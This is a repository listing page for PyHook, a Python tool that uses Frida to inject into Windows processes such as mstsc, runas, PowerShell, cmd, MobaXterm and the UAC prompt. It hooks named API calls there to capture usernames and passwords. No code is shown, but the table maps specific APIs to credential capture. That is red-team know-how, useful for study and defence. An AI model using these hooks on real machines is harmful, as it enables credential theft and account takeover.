IlanKalendarov/PyHook IlanKalendarov/PyHook

  • Stars
    star
    180
  • Rank 212,118 (Top 5 %)
  • Language
    Python
  • License
    BSD 3-Clause "New...
  • Created about 3 years ago
  • Updated about 2 months ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
IlanKalendarov/PyHook
github

IlanKalendarov

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

PyHook is an offensive API hooking tool written in python designed to catch various credentials within the API call.

PyHook

PyHook is the python implementation of my SharpHook project, It uses various API hooks in order to give us the desired credentials.

PyHook Uses frida to inject it's dependencies into the target process

Supported Processes

Process API Call Description Progress
mstsc CredUnPackAuthenticationBufferW Hooks CredUnPackAuthenticationBufferW from mstsc and outputs username and password DONE
runas CreateProcessWithLogonW Hooks CreateProcessWithLogonW from runas and outputs username, password and a domain name. DONE
PowerShell CreateProcessWithLogonW Hooks CreateProcessWithLogonW from PowerShell and outputs username, password and a domain name (e.g - Start-Process cmd -Credential X). DONE
cmd RtlInitUnicodeStringEx Hooks RtlInitUnicodeStringEx from cmd and outputs data from specific filters (e.g - "-p", "password" etc). DONE
MobaXterm CharUpperBuffA Hooks CharUpperBuffA from MobaXterm and outputs credentials for RDP and SSH logins. DONE
explorer (UAC Prompt) CredUnPackAuthenticationBufferW Hooks CredUnPackAuthenticationBufferW from explorer and outputs username, password and a domain name. DONE

Demo

Link to my blog post covering this topic: https://ilankalendarov.github.io/posts/offensive-hooking

More Repositories

1

SharpHook

SharpHook is an offensive API hooking tool designed to catch various credentials within the API call.
C#
309
star
2

IlanKalendarov.github.io

Shell
2
star